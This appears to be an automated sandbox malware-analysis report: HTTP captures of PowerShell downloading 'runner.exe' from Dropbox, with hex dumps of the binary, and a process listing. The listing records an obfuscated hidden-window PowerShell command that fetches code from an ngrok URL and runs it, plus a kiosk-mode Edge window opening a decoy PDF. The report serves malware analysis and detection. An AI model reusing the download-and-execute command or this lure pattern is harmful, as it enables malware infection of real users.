                                                                                                                                                                                                                                                                                              2024-12-10 17:40:34 UTC212OUTGET /scl/fi/j7hppco3s9jk3ymjpq2fd/runner.exe?rlkey=domk98n19y2kahyfqc64qkti5&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:35 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                              Content-Security-Policy: worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; img-src https://* data: blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; media-src https://* blob: ; font-src https://* data: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://pho [TRUNCATED]
                                                                                                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                              Location: https://uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com/cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1#
                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                              Set-Cookie: gvc=Mjk3MDUwOTY2NTA2MTE1MzQ0NTA2NTI0NTI5NTA0NjI4MTIzNTA2; Path=/; Expires=Sun, 09 Dec 2029 17:40:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: t=KllsIpUSvLOUTk_CcP9IE_lz; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:40:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=KllsIpUSvLOUTk_CcP9IE_lz; Path=/; Expires=Wed, 10 Dec 2025 17:40:34 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                              Set-Cookie: __Host-ss=V1PSzdoKIw; Path=/; Expires=Wed, 10 Dec 2025 17:40:34 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:40:34 GMT
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:35 GMT
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: e6b02e7ba1d0460a8735f73300abe2e6
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:35 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                              14192.168.2.549811162.125.69.154438496C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:37 UTC370OUTGET /cd/0/get/CgBJ3KPQg3f1hnXBBFoErQRBerl3hIC7XtKyYfnYQtZl697h631aSu7BMPGgP8e3r3-JuxOvus4lwkahQAIsSoKq1oc0BdrqvfMvNrcfSVb6xuJU3btyi6jDr4ASGY_cplAVpFyHvoNbZGDcUjHMVgbQ/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                              Host: uc80118ab4f2898881367e3418a6.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC738INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                              Content-Type: application/binary
                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                              Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe
                                                                                                                                                                                                                                                                                              Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              Etag: 1733821048842868d
                                                                                                                                                                                                                                                                                              Pragma: public
                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                              X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                              X-Server-Response-Time: 256
                                                                                                                                                                                                                                                                                              X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                              Date: Tue, 10 Dec 2024 17:40:37 GMT
                                                                                                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                              Content-Length: 1843712
                                                                                                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                              X-Dropbox-Request-Id: d6ddcafcb66e49899a4380bf402a4fd9
                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC15646INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 74 a3 a5 f4 30 c2 cb a7 30 c2 cb a7 30 c2 cb a7 17 04 a5 a7 31 c2 cb a7 17 04 a6 a7 33 c2 cb a7 17 04 b0 a7 2a c2 cb a7 8d 8d 5d a7 33 c2 cb a7 2e 90 5e a7 3d c2 cb a7 2e 90 48 a7 25 c2 cb a7 2e 90 4f a7 3f c2 cb a7 2e 90 58 a7 27 c2 cb a7 30 c2 ca a7 c5 c1 cb a7 2e 90 41 a7 00 c2 cb a7 2e 90 5f a7 31 c2 cb a7 2e 90 5a a7 31 c2 cb a7 52 69 63 68 30 c2 cb a7 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$t00013*]3.^=.H%.O?.X'0.A._1.Z1Rich0
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: c6 74 0e 8b 17 50 8b 42 38 8b cf ff d0 89 44 24 40 8b 43 10 33 f6 89 74 24 3c 3b c6 74 0e 8b 17 50 8b 42 30 8b cf ff d0 89 44 24 3c 6a 58 8d 4c 24 4c 56 51 89 74 24 50 e8 35 f8 06 00 8b 57 08 8b 35 54 c1 47 00 83 c4 0c 6a 06 52 ff d6 50 e8 28 e2 06 00 85 c0 74 1f 8b 47 08 6a 06 50 ff d6 50 e8 16 e2 06 00 8b 50 04 8d 4c 24 44 51 6a 5c 52 ff 15 64 c1 47 00 83 7c 24 4c 00 0f 84 51 01 00 00 57 8d 44 24 1c 8d 74 24 14 e8 a2 0c 01 00 8b 4c 24 4c 85 c9 7d 10 81 c1 10 0e 00 00 89 4c 24 1c db 44 24 1c eb 10 b8 10 0e 00 00 99 f7 f9 89 54 24 1c db 44 24 1c d9 5c 24 1c d9 ee d9 44 24 1c dd e1 df e0 dd d9 f6 c4 44 7a 12 8b 5c 24 14 dd d8 8b 4c 24 10 33 f6 89 74 24 14 eb 4c dc 15 f0 85 48 00 df e0 f6 c4 44 7a 12 8b 5c 24 10 dd d8 8b 4c 24 14 33 f6 89 5c 24 14 eb 2d dc
                                                                                                                                                                                                                                                                                              Data Ascii: tPB8D$@C3t$<;tPB0D$<jXL$LVQt$P5W5TGjRP(tGjPPPL$DQj\RdG|$LQWD$t$L$L}L$D$T$D$\$D$Dz\$L$3t$LHDz\$L$3\$-
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC738INData Raw: 74 09 56 e8 26 9f 06 00 83 c4 04 8b c6 5e c2 04 00 cc f6 44 24 04 01 56 8b f1 c7 06 c4 f1 47 00 74 09 56 e8 06 9f 06 00 83 c4 04 8b c6 5e c2 04 00 cc 56 8b f1 e8 08 f6 ff ff f6 44 24 08 01 74 09 56 e8 e7 9e 06 00 83 c4 04 8b c6 5e c2 04 00 cc cc 51 c7 01 cc f1 47 00 e8 e4 f5 ff ff 59 c3 cc cc 83 79 40 00 75 19 8b 54 24 08 8b 01 8b 40 4c 52 8b 54 24 08 52 ff d0 b8 01 00 00 00 c2 08 00 8b 44 24 08 8b 11 8b 52 50 50 8b 44 24 08 50 ff d2 b8 01 00 00 00 c2 08 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 44 8b 45 08 d9 ee 33 d2 d9 5c 24 14 53 8b 5d 0c 25 00 00 00 c0 56 8b f1 89 56 64 89 44 24 2c 8b 46 1c 57 8b 38 8b 46 08 81 e3 00 00 00 c0 89 74 24 10 89 54 24 1c 89 54 24 24 89 54 24 14 89 54 24 28 c7 44 24 18 01 00 00 00 89 5c 24 2c 89 54 24 3c 89 54 24
                                                                                                                                                                                                                                                                                              Data Ascii: tV&^D$VGtV^VD$tV^QGYy@uT$@LRT$RD$RPPD$PUDE3\$S]%VVdD$,FW8Ft$T$T$$T$T$(D$\$,T$<T$
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: 8b 44 24 40 33 c9 8b 74 24 44 3b 71 14 75 0a ff 15 fc c2 47 00 8b 44 24 40 8b 3e 8b 5c 24 2c 8b 74 24 10 33 d2 e9 fc fd ff ff 8b 08 eb d8 8b ff 8b 56 24 8b 4a 18 03 4a 10 8b 46 38 01 4e 64 8b 4e 64 3b c8 8b f9 7f 02 8b f8 8b 45 0c 25 ff ff ff 3f 81 fb 00 00 00 80 74 4a 81 fb 00 00 00 40 75 02 8b f8 89 7c 24 2c 8b c7 25 ff ff ff 00 2b c1 03 44 24 34 83 7c 24 38 00 89 44 24 34 75 35 d9 ee d8 5c 24 20 df e0 f6 c4 05 7b 28 8b 4c 24 14 8b 44 24 28 3b c8 0f 8f 0c 02 00 00 8b c8 e9 05 02 00 00 3b c7 7d bc 0d 00 00 00 01 8b f8 89 44 24 2c eb b3 d9 44 24 20 c7 46 64 00 00 00 00 8b 56 1c d9 5c 24 38 8b 4e 08 8b 3a 89 4c 24 40 8b 5e 1c 8b 46 08 89 7c 24 44 85 c9 74 04 3b c8 74 06 ff 15 fc c2 47 00 3b fb 0f 84 a5 01 00 00 8b 44 24 40 85 c0 75 70 ff 15 fc c2 47 00 33
                                                                                                                                                                                                                                                                                              Data Ascii: D$@3t$D;quGD$@>\$,t$3V$JJF8NdNd;E%?tJ@u|$,%+D$4|$8D$4u5\$ {(L$D$(;;}D$,D$ FdV\$8N:L$@^F|$Dt;tG;D$@upG3
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16114INData Raw: 83 7e 20 00 75 55 8b 16 8b 02 6a 01 8b ce ff d0 8d 4c 24 18 ff 15 24 ce 47 00 8d 5c 24 5c e8 6d 53 00 00 8b 4c 24 5c 51 e8 1f 5c 06 00 83 c4 04 8d 4c 24 24 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 33 c0 8b 4c 24 78 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 8b 55 0c 8b 45 08 8b 4c 24 28 52 50 68 38 e7 47 00 56 e8 ee de ff ff 8d 4c 24 18 ff 15 24 ce 47 00 8d 5c 24 5c e8 0b 53 00 00 8b 4c 24 5c 51 e8 bd 5b 06 00 83 c4 04 8d 4c 24 24 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 8b c6 8b 4c 24 78 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc 55 8b ec 83 e4 f8 6a ff 68 ca ad 47 00 64 a1 00 00 00 00 50 83 ec 30 53 56 57 a1 28 60 49 00 33 c4 50 8d 44 24 40 64 a3 00 00 00 00 8b f1 89 74 24 18 33 c0 89 44 24 10 39 46 3c 75 15 8b 4c
                                                                                                                                                                                                                                                                                              Data Ascii: ~ uUjL$$G\$\mSL$\Q\L$$$GL$$G3L$xdY_^[]UEL$(RPh8GVL$$G\$\SL$\Q[L$$$GL$$GL$xdY_^[]UjhGdP0SVW(`I3PD$@dt$3D$9F<uL
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: 01 00 00 6a 00 6a 00 52 ff 15 e0 c5 47 00 e8 fb 01 00 00 8d 4c 24 14 c7 84 24 78 0a 00 00 ff ff ff ff e8 37 27 02 00 8b 45 0c c7 00 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 4d 0c c7 01 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 55 0c c7 02 00 00 00 00 8b 8c 24 70 0a 00 00 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 cc cc cc cc 6a ff 68 19 7c 47 00 64 a1 00 00 00 00 50 83 ec 28 a1 28 60 49 00 33 c4 89 44 24 20 53 57 a1 28 60 49 00 33 c4 50 8d 44 24 34 64 a3 00 00 00 00 8b 44 24 44 8b da 89 83 14 03 00 00 89 8b 18 03 00 00 e8 39 01 00 00 83 bb 14 03 00 00 00 0f 84 fb 00 00 00 68 15 04 00 00 8b cb e8 96 1c 06 00 85 c0 0f 84 e7 00 00 00 8d 4c 24 10 ff 15 28 ce 47
                                                                                                                                                                                                                                                                                              Data Ascii: jjRGL$$x7'E$pdY_^[]M$pdY_^[]U$pdY_^[]jh|GdP((`I3D$ SW(`I3PD$4dD$D9hL$(G
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: 37 04 3b f3 75 e8 5f 5e 8b c5 5d c3 cc cc 57 8b f8 8b d1 2b d6 b8 67 66 66 66 f7 ea c1 fa 03 8b c2 c1 e8 1f 03 c2 8d 04 80 03 c0 03 c0 8b d0 8b c7 2b c2 3b f1 74 30 8b d7 2b d1 8d 49 00 8b 79 ec 83 e9 14 89 3c 0a 8b 79 04 89 7c 0a 04 8b 79 08 89 7c 0a 08 8b 79 0c 89 7c 0a 0c 8b 79 10 89 7c 0a 10 3b ce 75 d7 5f c3 cc cc cc cc cc 55 8b ec 6a ff 68 95 66 47 00 64 a1 00 00 00 00 50 83 ec 08 53 56 57 a1 28 60 49 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 75 0c 8b f9 33 db 89 75 ec 89 5d fc 3b 7d 08 74 41 c6 45 fc 01 3b f3 74 09 57 8b ce ff 15 04 ce 47 00 83 c6 04 88 5d fc 89 75 0c 83 c7 04 eb dc 8b 75 ec 8b 7d 0c 3b f7 74 0f 8b ce ff 15 24 ce 47 00 83 c6 04 3b f7 75 f1 33 db 53 53 e8 a4 f5 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d
                                                                                                                                                                                                                                                                                              Data Ascii: 7;u_^]W+gfff+;t0+Iy<y|y|y|y|;u_UjhfGdPSVW(`I3PEdeu3u];}tAE;tWG]uu};t$G;u3SSMdY_^[]
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC270INData Raw: 85 87 02 00 00 8b 8b 94 00 00 00 33 ff 57 57 68 04 10 00 00 51 ff 15 04 c6 47 00 85 c0 75 1a 8b 55 0c 89 3a 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 53 e8 ef fb 00 00 05 de 7f ff ff 83 c4 04 83 f8 04 0f 87 33 02 00 00 ff 24 85 94 8d 41 00 8d 44 24 24 50 e8 cd 8a ff ff 8d 43 74 89 7c 24 48 e8 21 09 00 00 89 44 24 10 3b c7 0f 84 9b 00 00 00 8b bb c4 02 00 00 8b 83 c0 02 00 00 e8 44 02 01 00 8d 4c 24 20 8b f0 ff 15 28 ce 47 00 c6 44 24 48 01 eb 05 90 8b 5c 24 14 8b 7c 24 10 8b 8b 94 00 00 00 6a 02 4f 57 68 0c 10 00 00 51 ff 15 04 c6 47 00 8d 54 24 20 40 52 89 44 24 14 e8 43 1f 04 00 8d 5c 24 1c 8d 7c 24 24 89 44 24 1c e8 12 02 00 00 83 7c 24 10 00 75 bb 8b 44 24 14 8b b0 c4 02 00 00 e8 ec c3 ff ff e8 e7 c3 ff ff 8b 50 20 56 8b cf 51 68
                                                                                                                                                                                                                                                                                              Data Ascii: 3WWhQGuU:L$@dY_^[]S3$AD$$PCt|$H!D$;DL$ (GD$H\$|$jOWhQGT$ @RD$C\$|$$D$|$uD$P VQh
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: ff 15 24 ce 47 00 8d 44 24 24 e8 b1 01 00 00 e9 61 01 00 00 83 c3 74 8b c3 e8 52 b1 fe ff 8b f8 33 f6 85 ff 0f 86 4b 01 00 00 8d 9b 00 00 00 00 6a 03 6a 03 56 8b cb e8 74 a1 05 00 46 3b f7 72 ef e9 2f 01 00 00 83 c3 74 8b c3 e8 20 b1 fe ff 8b f8 33 f6 85 ff 0f 86 19 01 00 00 8d 64 24 00 6a 03 6a 00 56 8b cb e8 44 a1 05 00 46 3b f7 72 ef e9 ff 00 00 00 8d 73 74 8b c6 e8 f0 b0 fe ff 89 44 24 18 85 c0 0f 86 e9 00 00 00 8d 64 24 00 8b 83 94 00 00 00 6a 03 57 68 2c 10 00 00 50 ff 15 04 c6 47 00 6a 03 8b ce 85 c0 74 04 6a 00 eb 02 6a 03 57 e8 f7 a0 05 00 47 3b 7c 24 18 72 d0 e9 b0 00 00 00 8d 73 74 8b c6 e8 b1 07 00 00 89 44 24 1c 3b c7 0f 84 9a 00 00 00 8d 7c 24 1c 8b c6 e8 7a 07 00 00 6a 03 8b f8 57 8d 4c 24 20 51 8b ce e8 bf a0 05 00 6a 00 57 8d 54 24 1c 52
                                                                                                                                                                                                                                                                                              Data Ascii: $GD$$atR3KjjVtF;r/t 3d$jjVDF;rstD$d$jWh,PGjtjjWG;|$rstD$;|$zjWL$ QjWT$R
                                                                                                                                                                                                                                                                                              2024-12-10 17:40:38 UTC16384INData Raw: 00 68 d0 d9 47 00 68 f4 0e 48 00 c6 84 24 a0 00 00 00 02 e8 7e 74 05 00 50 8d 4c 24 1c ff 15 18 ce 47 00 8b 4c 24 30 3b cd 74 21 8b 11 8b 52 14 55 8d 44 24 5c 50 8b 44 24 20 68 00 20 00 00 50 8b 44 24 24 68 04 0f 48 00 50 ff d2 8d 4c 24 18 ff 15 24 ce 47 00 8d 4c 24 14 ff 15 24 ce 47 00 eb 0b 3b cd 74 07 8b 01 8b 50 10 ff d2 8d 44 24 2c 50 c7 84 24 94 00 00 00 ff ff ff ff e8 fe 43 03 00 b8 01 00 00 00 8b 8c 24 88 00 00 00 64 89 0d 00 00 00 00 59 5f 5e 5d 81 c4 84 00 00 00 c3 14 cb 41 00 2d cb 41 00 46 cb 41 00 5c cb 41 00 72 cb 41 00 88 cb 41 00 9e cb 41 00 cc cc cc cc 83 ec 18 53 55 56 33 f6 57 89 74 24 10 39 74 24 2c 0f 84 e1 00 00 00 bf 01 00 00 00 8b df e8 4d 0e 00 00 8b e8 8b c7 8b ce d3 e0 85 c5 74 26 8d 7e 41 57 e8 c8 0e 00 00 83 c4 04 85 c0 74 02
                                                                                                                                                                                                                                                                                              Data Ascii: hGhH$~tPL$GL$0;t!RUD$\PD$ h PD$$hHPL$$GL$$G;tPD$,P$C$dY_^]A-AFA\ArAAASUV3Wt$9t$,Mt&~AWt


                                                                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                                                              Start time:12:39:58
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6af090000
                                                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                                                              Start time:12:39:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                                                                              Start time:12:39:59
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias eaa685 curl ; sal dc394c iEx ; dc394c(eaa685 -Uri https://7bz5nc0bdyga37scjk9otosvcvcl5wyc.ngrok.app/api/secure/fc08667ad2d7db61431b61a30eb0ffa8 -UseBasicParsing)
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                                                                              Start time:12:40:16
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                                                                                                              Start time:12:40:17
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                              File size:55'320 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                                                                                                              Start time:12:40:17
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2032,i,3747438541677274565,12230203629466347722,262144 /prefetch:3
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff632ac0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                              MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                                                                                                              Start time:12:40:17
                                                                                                                                                                                                                                                                                              Start date:10/12/2024
                                                                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1
                                                                                                                                                                                                                                                                                              Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                              File size:4'210'216 bytes
